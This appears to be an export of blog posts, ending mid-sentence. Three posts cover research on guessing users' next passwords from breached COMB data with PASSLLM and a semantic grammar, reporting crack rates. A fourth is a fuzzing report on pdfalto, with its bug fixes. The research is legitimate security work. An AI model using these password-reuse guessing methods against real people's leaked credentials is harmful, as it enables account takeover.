[{"content":"1. Recap – From PASSLLM Back to Semantics In the last post, From COMB to PASSLLM: Setting a Semantic Baseline, I plugged my cleaned COMB dataset into PASSLLM’s reuse pipeline and asked a simple question:\nIf I give a model one of your old passwords, how often can it guess the next one within 1,000 tries?\nPASSLLM gave me a surprisingly strong baseline on semantic-looking reuse pairs, even after I aggressively removed email-based and name-based passwords.\nBut that work was still very black-box LLM-ish. For the next step, I wanted something more interpretable:\nCan we explicitly model how the structure and semantics of passwords change between pw₁ and pw₂? And can we do it in a way that feels closer to Veras et al.’s classic “Semantic Patterns of Passwords”? That’s what this post is about.\n2. Adapting Veras’ Semantic Grammar to Password Reuse Veras et al. built a semantic PCFG trained on RockYou: segment passwords into chunks, POS-tag them, map content words to WordNet synsets, then learn a grammar over syntactic and semantic tags. Their guess generator is fully unconditional: it just outputs passwords in decreasing probability order.\nMy scenario is different:\nGiven one of your passwords (pw₁), I want to predict your next password (pw₂).\nSo instead of a global PCFG over single passwords, I built a conditional model over password pairs, while reusing as much of the Veras pipeline as possible:\nSame segmentation and POS-tagging logic. Same WordNet-based semantic abstraction with tree-cut models. But a different final layer:\nI explicitly learn $$P(\\text{pw2\\_pattern} \\mid \\text{pw1\\_pattern})$$\nand a tag lexicon $$P(w \\mid t)$$, then combine them to generate guesses. In other words, I kept their semantic eyes, but gave them a reuse brain.\n3. Dataset \u0026amp; Pattern Statistics at a Glance The data is a user-level split of email–password pairs, where each row is a sister pair (pw₁, pw₂). 
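As a minimal sketch, the conditional layer above reduces to two count tables (a toy illustration; all function and variable names here are hypothetical, not the actual pipeline code):

```python
from collections import Counter, defaultdict

# Count tables for the two distributions described above:
# transitions[s][r]  ~ P(pw2_pattern = r | pw1_pattern = s)
# lexicon[t][w]      ~ P(w | t), the tag lexicon
transitions = defaultdict(Counter)
lexicon = defaultdict(Counter)

def observe(s_pattern, r_pattern, tagged_pw2):
    """Update counts from one training pair; tagged_pw2 is [(tag, token), ...]."""
    transitions[s_pattern][r_pattern] += 1
    for tag, token in tagged_pw2:
        lexicon[tag][token] += 1

def p_transition(s_pattern, r_pattern):
    total = sum(transitions[s_pattern].values())
    return transitions[s_pattern][r_pattern] / total if total else 0.0

def p_token(tag, token):
    total = sum(lexicon[tag].values())
    return lexicon[tag][token] / total if total else 0.0

def score_guess(s_pattern, r_pattern, tagged_guess):
    """P(r | s) times the product of P(token | tag) for each filled slot."""
    score = p_transition(s_pattern, r_pattern)
    for tag, token in tagged_guess:
        score *= p_token(tag, token)
    return score
```

Guess generation then amounts to enumerating the top pw₂ patterns for a given pw₁ pattern and filling each tag slot with its most probable tokens, in decreasing score order.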
I keep emails only to separate users; all evaluation is done on passwords.\n3.1 Train / Test split I sampled:\n83,390 password pairs for training\n20,939 password pairs for testing\nwith no overlap in the email field between the two splits.\nTrain: 83,390 pairs Test: 20,939 pairs (no shared emails) 3.2 POS-only vs Semantic patterns For each password, I extract a structural pattern:\nPOS-only: tags like (nn1)(number2) Semantic: tags like (nn1_physical_entity.n.01)(number2) Here is what the pattern space looks like:\nsetting | split | #pairs | #unique pw1_pattern | #unique pw2_pattern\nPOS-only | train | 83,390 | 12,471 | 12,289\nPOS-only | test | 20,939 | 4,478 | 4,458\nSemantic | train | 83,390 | 14,884 | 14,604\nSemantic | test | 20,939 | 5,291 | 5,229\nSemantic tagging gives me a slightly larger and more fine-grained pattern space: more unique patterns per split, but not explosively so. That’s the first sign that semantic categories are adding detail without completely fragmenting the data.\n4. What Do Users Actually Reuse? Pattern Transitions At the heart of this experiment is the pattern-transition model:\nFor each sister pair (pw₁, pw₂), treat pw₁’s pattern as $s$ and pw₂’s pattern as $r$, and learn how often $r$ follows $s$.\nSome of the most frequent transitions in the POS-only setting are delightfully boring:\n(nn1)(number2) → (nn1)(number2) (nn1) → (nn1) (np1) → (np1) In other words, a lot of users simply keep the same structural recipe: “word + two digits” stays “word + two digits”, even when the actual word or digits change.\nIn the semantic setting, you see the same idea but with concepts:\n(nn1_physical_entity.n.01)(number2) → (nn1_physical_entity.n.01)(number2) (np1_unk) → (np1_unk) Here, “some physical thing + year-like number” often stays exactly that, even if the “thing” or the year changes. Conceptually, people tend to stick to the same template.\n5. How Wild Is the Test Set? 
Unseen Patterns A natural question is: how many pw₁/pw₂ patterns at test time have never been seen in training?\nPOS-only: 2,215 unseen pw₁ patterns (~3,028 pairs), 2,219 unseen pw₂ patterns (~2,968 pairs).\nSemantic: 2,710 unseen pw₁ patterns (~3,608 pairs), 2,716 unseen pw₂ patterns (~3,538 pairs).\nSo roughly a third of the test pairs involve at least one pattern that did not appear in training. That’s why I need a backoff strategy (edit-distance nearest neighbour) for pw₁ patterns that never show up during training.\nI’ll come back to that when discussing the model design.\n6. Can We Actually Guess pw₂? Hit@K Results With all the pieces in place, I ran a reuse-guessing experiment:\nFor each test user, I give the model pw₁ and allow up to 1,000 guesses for pw₂. I evaluate both: Hit@K on the exact pw₂, and Hit@K on the pw₂ pattern (ignoring the concrete tokens). Here is the summary (POS-only vs Semantic):\nK | Hit@K pw2 (POS) | Hit@K pw2 (Semantic) | Hit@K pattern (POS) | Hit@K pattern (Semantic)\n1 | 0.0044 | 0.0296 | 0.2704 | 0.2386\n10 | 0.0872 | 0.1074 | 0.4851 | 0.4522\n100 | 0.1352 | 0.1518 | 0.4851 | 0.4522\n1000 | 0.2054 | 0.2230 | 0.4851 | 0.4522\nA few observations:\nSemantic beats POS-only on pw₂ at every K: even a modest semantic signal helps guide guesses. Pattern Hit@K saturates quickly (by K=10). This is by design: for each pw₁ pattern, I only enumerate the top 5 pw₂ patterns, and the pattern-level Hit@K is computed over unique patterns. Once K is larger than 5, you don’t see new patterns—only more token variations of the same patterns. In other words, the model is quite good at guessing the structural change from pw₁ to pw₂, and the hard part is filling in the exact tokens.\n","permalink":"https://blacksugar.top/posts/clean_the_chaos_3/","summary":"\u003ch2 id=\"1-recap--from-passllm-back-to-semantics\"\u003e1. 
Recap – From PASSLLM Back to Semantics\u003c/h2\u003e\n\u003cp\u003eIn the last post, \u003cem\u003eFrom COMB to PASSLLM: Setting a Semantic Baseline\u003c/em\u003e, I plugged my cleaned COMB dataset into PASSLLM’s reuse pipeline and asked a simple question:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eIf I give a model one of your old passwords, how often can it guess the next one within 1,000 tries?\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003ePASSLLM gave me a surprisingly strong baseline on \u003cem\u003esemantic-looking\u003c/em\u003e reuse pairs, even after I aggressively removed email-based and name-based passwords.\u003c/p\u003e","title":"「古度」From Veras to Password Reuse: Semantic Patterns of Sister Passwords"},{"content":"0. Recap – From Raw Breaches to Semantic Password Pairs In the previous post, “Cleaning the Chaos”, I wrote about turning the COMB mega-breach into something that actually reflects human semantics instead of just random junk strings. The goal was simple: if we want to study whether passwords like\ndarkness → midnight summer19 → sunshine20 are related at a conceptual level, then our dataset needs to be full of these “semantic siblings,” not hashes, email copies, or unreadable gibberish.\nThat first phase gave me a cleaned pool of password pairs where:\nEmails and trivial email-based passwords were removed. Name-like passwords, especially those mirroring the local-part of the email, were heavily filtered out. Obvious gibberish, Base64 / hash-like strings, and keyboard walks were pruned. I focused on English-like strings with plausible semantics, discarding Chinese pinyin and other non-target language material. That post ended at the data layer. In this phase, I finally plugged that cleaned COMB data into PASSLLM and asked the natural next question:\nIf I train a reuse-based PASSLLM model only on “semantic-looking” password pairs, how well does it actually guess?\n1. 
Reuse-Based Guessing in PASSLLM (Paper Recap) PASSLLM is a framework that adapts LLMs (e.g., Mistral, Qwen2.5) to password guessing using LoRA fine-tuning and custom generation algorithms. It covers four scenarios:\nTrawling (RockYou-style) PII-based targeted guessing Reuse-based targeted guessing (sister passwords) Multi-source (PII + reuse) guessing For reuse-based attacks, the paper defines several COMB-based scenarios (Table 5):\nCOMB (pw₁ → pw₂) – one sister password, one target.\nCOMB (pw₁, pw₂ → pw₃) – two sisters, one target.\nCOMB (pw₁…pwₙ → pwₙ₊₁, n∈[3,7]) – full multi-password reuse.\nAll are trained with 100k samples and tested on 10k samples, with a maximum of 1,000 guesses per user.\nKey takeaways from the reuse section:\nPASSLLM-II beats all reuse models (Pass2Edit, Pass2Path, PointerGuess, TarGuess-II, PassBERT) within 1,000 guesses. In the single-password COMB scenario, PASSLLM-II improves over Pass2Edit by 8.27–9.66 percentage points within 1,000 guesses. In multi-password (≥3) scenarios, PASSLLM-II reaches 36.63% success within 10³ guesses (with target ≠ any sister password). On top of that, they distill the 7B Mistral-based model into Qwen2.5-0.5B, forming PASSLLM-II-d. Distillation gives:\n4–6× speedup for targeted generation. Almost identical success curves in reuse scenarios (e.g., 126→CSDN). In other words: a compact 0.5B model can still behave like a serious password cracker—if it’s trained on the right data.\n2. My Setup – comb_qwen0.5b on COMB-Clean For this phase, I used the released comb_qwen0.5b checkpoint (PASSLLM’s distilled Qwen2.5-0.5B model for reuse) as the base, and then applied LoRA fine-tuning on my own cleaned COMB reuse dataset.\nConcretely:\nBase model: comb_qwen0.5b (Qwen2.5-0.5B, PASSLLM-II-d style). Scenario: reuse-based targeted guessing, using (sister password → target password) pairs from COMB. Training set: ~500,000 cleaned semantic pairs (my COMB-clean). Validation sets: 5k split: 5,000 pairs. 
25k split: 25,000 pairs. Generation and evaluation followed the PASSLLM toolchain. After running the guessing pipeline, I used a shell script to aggregate, for each cracked account, the number of guesses needed (capped at 1,000) and report:\nMinimum / Maximum guesses among successes. Median / Average guesses. Count = number of accounts successfully cracked within 1,000 guesses. To turn Count into a success rate, I divide it by the total number of samples in the split (5,000 or 25,000).\n3. Results on COMB-Clean 3.1 5k Validation Split Output:\nMinimum: 2 Maximum: 999 Median: 3 Average: 69.9786756453423 Count: 1782 Interpretation (assuming 5,000 samples):\nSuccesses: 1,782 cracked accounts. Success rate: 1,782 / 5,000 ≈ 35.6% within 1,000 guesses. Guess distribution: Median = 3 ⇒ Half of the cracked accounts are guessed in 3 guesses or fewer. Mean ≈ 70 ⇒ There’s a long tail: some passwords only appear late in the 1,000-guess budget. 3.2 25k Validation Split Output:\nMinimum: 2 Maximum: 1000 Median: 2 Average: 60.89439332334689 Count: 9346 Assuming 25,000 samples:\nSuccesses: 9,346 cracked accounts. Success rate: 9,346 / 25,000 ≈ 37.4% within 1,000 guesses. Guess distribution: Median = 2 → for those that are cracked, PASSLLM often hits them very early. Average ≈ 61 → again, a long tail of more difficult cases. Now the interesting part:\n5k split: ~35.6% success. 25k split: ~37.4% success. The performance is very stable across the two splits and numerically very close to the ~36.6% reported in the PASSLLM paper for COMB multi-password reuse. This is already a good sign that:\nThe distilled 0.5B Qwen model plus LoRA fine-tuning is strong enough. My cleaned COMB dataset, although semantically filtered, still captures a substantial amount of realistic reuse behavior. 4. 
How My Dataset Differs from PASSLLM’s COMB Even though the success rates look close, the datasets behind them are not the same.\n4.1 PASSLLM’s Philosophy: “Use All Reuse Behavior” In the paper, the authors explicitly point out that filtering training pairs based on cosine similarity (as done in Pass2Edit) is problematic because it removes legitimate reuse pairs that just happen to be embedding-distant (for example johndoe vs JOHNDOE). PASSLLM-II avoids this by training on the full reuse dataset without filtering.\nThis implies their COMB reuse training and test sets still contain:\nName-based passwords. Email-local-part reuse (alice1989 → alice1989!). Very small-edit patterns (pass123 → pass1234). Many structurally trivial yet security-relevant transformations. For each reuse scenario in Table 5, they fix the training size at 100k and use 10k samples for testing, noting that success rates converge beyond ~10k test entries.\n4.2 My Philosophy: “Emphasize Semantics, Not Trivial Reuse” My COMB-clean dataset does something quite different:\nAggressively removed name-like passwords that look like raw person names or clearly mirror the email local-part (johnsmith, Coursesauskas, etc.).\nRemoved email-like and email-derived passwords, such as:\n187@mail.ru → 187@mail.ru:0602 johndoe@example.com → johndoe@example.com;06026 Discarded sequences that look like random gibberish, especially where both sides of the pair are high-entropy strings like:\nQJbVJoWUwOCqBEm0 → ZGELiovZYWaeSqrfCUQ 0q00q0xpkm0oyco → 4q3xpkm2oyco Filtered out Chinese pinyin in order to concentrate on English-like strings, since the next phase of my work will use English-oriented semantic embeddings.\nThe result is a reuse dataset that:\nDownplays trivial reuse patterns (copying, local-part reuse, very small edits). Puts more emphasis on “semantic-looking” transformations where at least one side contains English-like tokens with potential conceptual meaning. 
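The filtering philosophy above can be made concrete with a rough sketch (thresholds and helper names are illustrative assumptions, not the exact production rules):

```python
import math

def shannon_entropy(s):
    # Bits per character over the string's empirical character distribution.
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))

def mirrors_local_part(email, password):
    # Trivial reuse: the password embeds the email's local part
    # (johndoe@gmail.com -> johndoe123).
    local = email.split("@")[0].lower()
    return len(local) >= 4 and local in password.lower()

def looks_like_gibberish(password, min_len=16, entropy_threshold=3.5):
    # Long, high-entropy strings are treated as machine-generated noise.
    return len(password) >= min_len and shannon_entropy(password) > entropy_threshold

def keep_pair(email, pw1, pw2):
    # A pair survives only if neither side is trivial reuse or gibberish.
    return not any(mirrors_local_part(email, pw) or looks_like_gibberish(pw)
                   for pw in (pw1, pw2))
```

Under these toy thresholds, a pair like darkness → midnight survives, while johndoe123 for johndoe@gmail.com or a high-entropy string like QJbVJoWUwOCqBEm0 gets dropped.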
So while the numerical success rates (~36–37%) are close to PASSLLM’s COMB multi-password results, the distribution of pairs is different: mine is intentionally “cleaner,” but it’s not a strict subset of the paper’s COMB scenarios; it’s a filtered, reweighted view of reuse.\n5. Comparing My Baseline to the Paper Putting everything side by side:\nModel family\nPaper: PASSLLM-II with a 7B Mistral teacher; evaluation often reports the teacher but also distills to Qwen2.5-0.5B (PASSLLM-II-d) for efficiency. Me: start from comb_qwen0.5b (Qwen2.5-0.5B distilled student), then apply LoRA fine-tuning on COMB-clean. Training data\nPaper (reuse, COMB): 100k unfiltered COMB pairs per scenario; full spectrum of reuse patterns. Me: ~500k heavily filtered pairs focusing on semantic plausibility, excluding many names, email copies, gibberish, and pinyin. Test data\nPaper: 10k COMB test pairs (no semantic filtering, just standard cleaning of non-ASCII and overly long strings). Me: 5k and 25k splits drawn from COMB-clean, where non-semantic and trivial reuse cases are underrepresented by design. Success rates within 1,000 guesses\nPaper (COMB multi-password reuse, ≥3 sisters): 36.63%. Me: ~35.6% on the 5k split and ~37.4% on the 25k split. Given that:\nI’m only using the 0.5B distilled Qwen model, not the 7B Mistral teacher. My dataset prunes away a lot of “cheap” reuse shortcuts like names and email-based passwords. I interpret this as:\nPASSLLM’s reuse architecture is surprisingly robust: it still performs strongly on a “semantic-leaning” subset of COMB. My cleaned dataset is not artificially impossible; it still retains many realistic reuse patterns—even after pruning out some of the obvious easy wins. This makes the current model a solid and realistic baseline for the next phase of my project.\n6. What This Baseline Means for the Next Steps This experiment is the bridge between my two earlier directions:\nPhase 1: make COMB usable for semantic analysis (cleaning out noise, names, junk). 
Phase 2 (this post): plug the cleaned data into PASSLLM’s reuse pipeline and see how a distilled 0.5B reuse model behaves. Now I have:\nA quantitative baseline for reuse on semantic-leaning COMB: ~36–37% success within 1,000 guesses on 5k and 25k splits. A controlled difference from the original PASSLLM setup: Same COMB origin, but filtered to emphasize English semantics and de-emphasize trivial reuse. For the next step, I’m going back to semantics, following the pipeline from “On the Semantic Patterns of Passwords and their Security Impact” by Veras et al.\nThe plan is:\nSemantic annotation of each password\nSegment passwords (ilovedogs2024 → i | love | dogs | 2024). POS-tag segments and map content words to WordNet synsets (e.g., dog.n.01, love.n.01), then generalize to higher-level categories (animal, emotion, event, etc.). Analyze “synset migration” between sister passwords\nFor each pair (old_password, new_password), compare their synset/category sequences. Count transitions like dog.n.01 → love.n.01 or cat.n.01 → birthday.n.02, and build a transition matrix over categories (e.g., animal → emotion, pet → event). Use these patterns to guide new models\nFirst, study which concepts tend to stay stable and which tend to drift when users change passwords. Then, design a password model (or a re-ranking layer on top of PASSLLM) that explicitly uses these synset transition patterns as a semantic prior. In short, instead of only asking “can we guess the next password?”, the next phase asks “how do concepts move when users change passwords?” and tries to turn that into a model.\n","permalink":"https://blacksugar.top/posts/clean_the_chaos_2/","summary":"\u003ch2 id=\"0-recap--from-raw-breaches-to-semantic-password-pairs\"\u003e0. 
Recap – From Raw Breaches to Semantic Password Pairs\u003c/h2\u003e\n\u003cp\u003eIn the previous post, \u003cstrong\u003e“Cleaning the Chaos”\u003c/strong\u003e, I wrote about turning the COMB mega-breach into something that actually reflects \u003cem\u003ehuman semantics\u003c/em\u003e instead of just random junk strings. The goal was simple: if we want to study whether passwords like\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003edarkness → midnight\nsummer19 → sunshine20\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eare related at a \u003cem\u003econceptual\u003c/em\u003e level, then our dataset needs to be full of these “semantic siblings,” not hashes, email copies, or unreadable gibberish.\u003c/p\u003e","title":"「古度」From COMB to PASSLLM: Setting a Semantic Baseline"},{"content":"0. Internship Background During my research internship at the Digital Security Group (Radboud University), I worked on a project titled “Semantic-Aware Password Guessing”, under the supervision of Xavier de Carné de Carnavalet.\nThe goal of this project was to explore whether semantic similarity—the kind of conceptual relation humans perceive between words like darkness and midnight—could be applied to model how users create new passwords.\nExisting password guessing models such as Pass2Path or Pass2Edit mainly rely on edit distance and structural transformations. They perform well when users make small tweaks, like password1 → password2, but fail when users create new passwords that carry similar meanings but very different characters.\nMy task was to build the foundation for a model that could recognize and learn from these semantic transformations. But before I could train anything meaningful, I needed a clean dataset that truly reflected human password semantics—and that’s where the long journey of data cleaning began.\n1. 
Starting Point: The COMB Dataset The COMB dataset is a monstrous collection of over 3 billion email-password pairs aggregated from hundreds of breaches. It contains everything—from real user passwords to garbage strings, hashes, and even website footers that accidentally got scraped in.\nBefore any semantic modeling could happen, I needed a way to isolate real, human-like passwords and discard noise. My goal wasn’t just to clean the data but to make sure what remained could reveal meaningful semantic relationships between users’ passwords.\n2. Phase One – Filtering Out the Obvious Junk The first stage was about basic hygiene. I started by parsing raw text lines and splitting them into email : password pairs. Then came a series of lightweight sanity checks:\nValid email check: reject anything without a proper structure (name@domain.tld), or domains with weird patterns. Password normalization: keep only printable ASCII, strip control characters. Minimum standards: At least 4 characters long Reasonable mix of letters and digits Not dominated by symbols or random gibberish Not too long (I capped at 30 characters) I also computed simple heuristics like Shannon entropy, vowel ratio, and symbol ratio to remove passwords that were clearly machine-generated or meaningless.\nThis step alone reduced the dataset from billions of entries to a much more manageable pool of plausible passwords.\n3. Phase Two – Human-Like Structure Filters Once the basic cleaning was done, I moved on to detecting passwords that looked human but weren’t useful for semantic study. These include things like:\nPerson-name-like passwords, e.g. johnsmith, maria1988, or alex_in_love. I used contextual leet normalization (p@ssw0rd → password) to handle creative spellings. If a password resembled a name and matched the local part of the user’s email, it was excluded. Email reuse or mirrored passwords, such as johndoe123 when the email was johndoe@gmail.com. 
These don’t reflect “semantic transformation,” just trivial reuse. Gibberish concatenations, e.g. asdfqwerzxcvbn or long repeating units like abcabcabcabc. I detected those through repeated substring patterns and long consonant runs. Each rule was designed to remove passwords that would otherwise bias the semantic analysis toward structural or personal reuse, instead of genuine conceptual variation.\n4. Phase Three – Semantic Pair Discovery With clean user-level data (each email mapped to multiple passwords), I could now look for semantic relationships between a user’s old and new passwords.\nMy idea was simple: passwords that mean similar things, even if they look completely different, should be considered related. For example:\ndarkness → midnight angel123 → heaven22 summer19 → sunshine20 To capture this, I used sentence embeddings to map passwords into a shared vector space, where semantic closeness could be measured by cosine similarity. However, to avoid being tricked by small structural overlaps, I combined semantic similarity with edit distance constraints—so that only truly “meaningful” connections were kept, not trivial typos or copies.\nThe result was a set of password pairs that were semantically linked but often had large character differences—a perfect foundation for training or evaluating semantic-aware password models.\n5. Phase Four – Sanity and Robustness Checks After generating semantic pairs, I still had to remove edge cases that slipped through:\nReverse variants, like abcd vs. dcba Hash-like or Base64 strings, e.g. 5f4dcc3b5aa765d61d8327deb882cf99 Double nonsense pairs, where both sides were unreadable noise Finally, I recalculated similarity in a digit-robust way: by testing both digit-removed and digit-masked versions (replacing numbers with [NUM]). 
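The digit-robust recalculation can be sketched as follows (difflib’s ratio stands in here for the embedding-based similarity of the real pipeline; names are illustrative):

```python
import re
from difflib import SequenceMatcher

def mask_digits(password):
    # Collapse each digit run into a single [NUM] placeholder.
    return re.sub(r"\d+", "[NUM]", password)

def strip_digits(password):
    return re.sub(r"\d+", "", password)

def digit_robust_similarity(pw1, pw2):
    # Score the raw pair, the digit-stripped pair, and the digit-masked pair,
    # and keep the best score, so changed numbers cannot hide a semantic match.
    # SequenceMatcher is a stand-in for the embedding-based cosine similarity.
    variants = [(pw1, pw2),
                (strip_digits(pw1), strip_digits(pw2)),
                (mask_digits(pw1), mask_digits(pw2))]
    return max(SequenceMatcher(None, a, b).ratio() for a, b in variants)
```

With this scheme, love123 and love2024 both reduce to love[NUM] and score as identical, while unrelated words still score low.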
This allowed me to identify pairs like love123 ↔ love2024 as similar, even though the numbers changed.\n","permalink":"https://blacksugar.top/posts/clean_the_chaos/","summary":"\u003ch2 id=\"0-internship-background\"\u003e0. Internship Background\u003c/h2\u003e\n\u003cp\u003eDuring my research internship at the Digital Security Group (Radboud University), I worked on a project titled “Semantic-Aware Password Guessing”, under the supervision of \u003ca href=\"https://xavier2dc.fr/\"\u003e\u003cstrong\u003eXavier de Carné de Carnavalet\u003c/strong\u003e\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eThe goal of this project was to explore whether semantic similarity—the kind of conceptual relation humans perceive between words like darkness and midnight—could be applied to model how users create new passwords.\u003c/p\u003e\n\u003cp\u003eExisting password guessing models such as Pass2Path or Pass2Edit mainly rely on edit distance and structural transformations. They perform well when users make small tweaks, like password1 → password2, but fail when users create new passwords that carry similar meanings but very different characters.\u003c/p\u003e","title":"「古度」Cleaning the Chaos"},{"content":"As part of the Software Security course at Radboud University, I conducted a fuzzing project targeting pdfalto, a command-line tool that converts PDF files into structured XML representations (ALTO format). The tool is written in C++ and relies heavily on the xpdf library, which is also implemented in C++.\nWe chose pdfalto because the PDF format is notoriously complex and error-prone, and the project seemed to have practical relevance — used in real-world contexts but not widely tested with fuzzing tools. 
The goal was to explore the effectiveness of several fuzzers and to identify potential bugs or vulnerabilities.\nThrough the experiments, several real issues were discovered, including segmentation faults, memory allocation errors, and a heap buffer overflow, most of which originated from the xpdf library.\nExperiments We performed 6 experiments in total on a remote machine running Ubuntu 22.04. We used an input corpus consisting of 43 PDF files and 7 non-PDF files. The PDF files were specifically selected to provoke interesting behaviour (edge cases). For example, the corpus included PDFs from many different typesetters, different image formats, tables, etc.\nThe results are summarized in Table 1. AFL was the only tool that found serious problems with a total of 114 crashes and 51 hangs (#1). We also ran AFL with ASan enabled (#3) which also found a crash. Furthermore, we tried Zzuf with and without ASan enabled, but no crashes or hangs were found (#2 and #5). Similarly, we did not find any crashes or hangs using Radamsa (#6). We also tried running HonggFuzz (#4). Even though we left it running for over 6 days by accident, it did not find any crashes or hangs.\nBesides these experiments, we also ran experiments using AFL and HonggFuzz using a single input file for several hours (we did not record the exact time), but we found no crashes or hangs with these experiments.\nIt must also be noted that AFL did not report any errors. 
This is somewhat strange since we observed manually that AFL generated inputs that triggered errors in pdfalto.\nExperiment | Tool | Time | Number of test cases | Issues found\n#1 | AFL | 12hr | 12k | no errors, 114 crashes, 51 hangs\n#3 | AFL + ASan | 3hr | 4k | no errors, 1 crash, no hangs\n#2 | zzuf | 15min | 5k | 2,319 errors, no crashes, no hangs\n#5 | zzuf + ASan | 15min | 5k | 2,319 errors, no crashes, no hangs\n#6 | Radamsa | 32min | 5k | 231k errors, no crashes, no hangs\n#4 | HonggFuzz | 6d 19hr 32min | 135,373k | no errors, no crashes, no hangs\nTable 1: Experiments performed, along with the results.\nEvery fuzzer (except HonggFuzz) reported a lot of errors that were thrown by the xpdf library. Most of these fall into one of the following three categories.\nConfig Errors: \u0026ldquo;Unknown config file command \u0026lsquo;cMipDir\u0026rsquo;\u0026rdquo; or \u0026ldquo;Bad \u0026lsquo;cMapDir\u0026rsquo; config file command\u0026rdquo; Syntax Errors: \u0026ldquo;Illegal character \u0026lsquo;{\u0026rsquo;,\u0026rdquo; \u0026ldquo;Illegal character in hex string,\u0026rdquo; and \u0026ldquo;Dictionary key must be a name object\u0026rdquo; Syntax Warnings: \u0026ldquo;PDF file is damaged - attempting to reconstruct xref table\u0026rdquo; These errors indicate that the developers of xpdf designed the library with erroneous input in mind. On some inputs, pdfalto would exit gracefully after throwing one of these errors, but we also found cases where one or multiple of these errors were thrown first, and pdfalto subsequently crashed.\nFixing the bugs found by AFL (Experiments #1 and #3) AFL proved to be greatly effective at finding crashes in pdfalto. We decided to dedicate some time to diagnosing what bugs it found and even implemented ad-hoc fixes for most of the crashes that it found.\nIt turns out that all the crashes that we found can be put into just a few categories. They are all caused by the xpdf library, which is used within pdfalto. We made heavy use of GDB in this debugging process. 
A repo with our bugfixes can be found here. Our adjustments can be found easily by searching the repo for // START FIX.\nSegmentation fault in XRef::fetch On line 1155 of XRef.cc, the function Object *XRef::fetch(int num, int gen, Object *obj, int recursion) is called. This leads to a segmentation fault on certain inputs. The program always seems to say Syntax Error (some number): Dictionary key must be a name object several times before this crash.\nObject *XRef::fetch(int num, int gen, Object *obj, int recursion) { XRefEntry *e; Parser *parser; Object obj1, obj2, obj3; XRefCacheEntry tmp; int i, j; .... } After some inspection in GDB, we found out that this bug is caused by an infinite recursion in the methods AcroForm::scanField in AcroForm.cc, Catalog::countPageTree in Catalog.cc, or Catalog::readPageLabelTree2 in Catalog.cc. Eventually, the program runs out of memory because of this infinite recursion and it throws a segmentation fault when trying to fetch a new object.\nIn each case, we fixed this by introducing a new method called \u0026lt;methodname\u0026gt;Safe which takes as an extra argument an integer with the recursion level. Then before making a recursive call, we increment this recursion level, and if it exceeds some limit, we simply return instead of doing anything. This is quite a crude fix, but our modified pdfalto no longer crashes on a lot of inputs that it crashed on before.\nFrom googling this segmentation fault, we found out that somebody has already fuzzed xpdf (but not pdfalto). In this 2023 forum post, the maintainer of xpdf says the following:\n\u0026ldquo;This problem is due to an object loop in the PDF structure. I\u0026rsquo;m working on an improved loop detector for Xpdf 5.\u0026rdquo;\nIt is good to see that the developer is already addressing this problem, but xpdf 4 is still the latest version at this moment.\nstd::bad_alloc() This error can be caused by trying to allocate too much memory for an image that is too big. 
In this case, it stems from line 7774 in XmlAltoOutputDev.cc: unsigned char *data = new unsigned char[width * height * 3];. We had a test case where the size becomes 18446744073119616992, which is obviously far too much memory to allocate. We fixed this bug by imposing a hard limit on the allocated memory size at this particular line. If the requested memory exceeds this limit, we simply exit with code -1.\nAnother error in line 7680 is analogous and was also fixed the same way.\nThe developer of xpdf has labeled this as intended behaviour, but we disagree. The program should check the memory limit and exit gracefully if it is exceeded. A better, more permanent way to fix this error is to assess at runtime whether enough memory is available for the allocation, and exit with a sensible error message if it is not.\nGMemException GMemException (General Memory Exception) is an exception implemented within the xpdf library that is thrown if something is wrong with the memory during execution. Quite a few of our test cases that crashed resulted in such a GMemException.\nThe developer of xpdf has confirmed that GMemException is intended behaviour in many cases. Therefore, we think that pdfalto should be responsible for catching this exception. We implemented this by simply putting the code that calls the xpdf library in a try-catch block, and exiting gracefully if GMemException is thrown.\nFloating-Point Exception This crash was caused by line 361 in Stream.cc:\nif (width \u0026gt; INT_MAX / nComps || nVals \u0026gt; (INT_MAX - 7) / nBits)\nIt turns out that this was actually caused by a division by zero when nComps was 0. 
We fixed it by checking at runtime whether nComps or nBits is zero:\nif ( nComps != 0 \u0026amp;\u0026amp; nBits != 0 \u0026amp;\u0026amp; (width \u0026gt; INT_MAX / nComps || nVals \u0026gt; (INT_MAX - 7) / nBits))\nA (potential) crash found by experiment #3 (AFL + ASan) - Heap Buffer Overflow Unlike the bugs that were found in experiment #1, this bug happens in pdfalto itself, not in the xpdf library. While executing AFL + ASan, ASan reported a heap-buffer-overflow. The error occurs in pdfalto.cc in the following section:\nchar *dirname; dirname = (char*)malloc(dirname_length + 1); strncat(dirname, thePath, dirname_length); dirname[dirname_length] = \u0026#39;\\0\u0026#39;; The issue is that dirname is allocated a length of dirname_length + 1, but strncat is used immediately without initializing dirname. strncat expects dirname to contain a null terminator to properly append content, but since dirname is uninitialized, this can lead to undefined behavior, including buffer overflows.\nWe fixed this crash by initializing dirname to an empty string after allocation, then using strncpy instead of strncat since we’re just copying thePath contents into dirname:\ndirname = (char*)malloc(dirname_length + 1); dirname[0] = \u0026#39;\\0\u0026#39;; // Initialize to an empty string strncpy(dirname, thePath, dirname_length); dirname[dirname_length] = \u0026#39;\\0\u0026#39;; // Ensure null termination HonggFuzz (Experiment #4) Concerning experiment #4 with HonggFuzz, the results were unsatisfactory. No notable crashes, timeouts or errors were observed during the experiment. The fuzzer maintained an average processing speed of 229 test cases per second, demonstrating high throughput efficiency. However, branch and edge coverage remained stationary at 0%, indicating that the fuzzer was unable to explore deeper execution paths within pdfalto. 
This lack of exploration is likely due to insufficient instrumentation or limited code paths triggered by the initial inputs.\nThe absence of new results raises important questions about the compatibility of HonggFuzz with this specific application and its dependencies. It suggests that the fuzzer might not be suitable for discovering vulnerabilities in pdfalto\u0026rsquo;s execution model, or that the input space had already been sufficiently exhausted during previous fuzzing campaigns. Alternatively, it could indicate pdfalto\u0026rsquo;s robustness under the specific test conditions, although this conclusion is uncertain given the tool\u0026rsquo;s apparent inability to expand code coverage.\nOverall, HonggFuzz proved to be a high-performance tool in terms of test case generation but failed to deliver actionable insights for this particular case study. Further experiments with refined configurations or additional instrumentation might be required to fully evaluate its potential.\nZzuf (Experiment #2 and #5) For experiments #2 and #5, we systematically varied the mutation rates from 1% to 10% in increments, using a script to apply Zzuf specifically to all PDF files. The mutation rates determined the proportion of bits in the PDF data that were randomly flipped, with 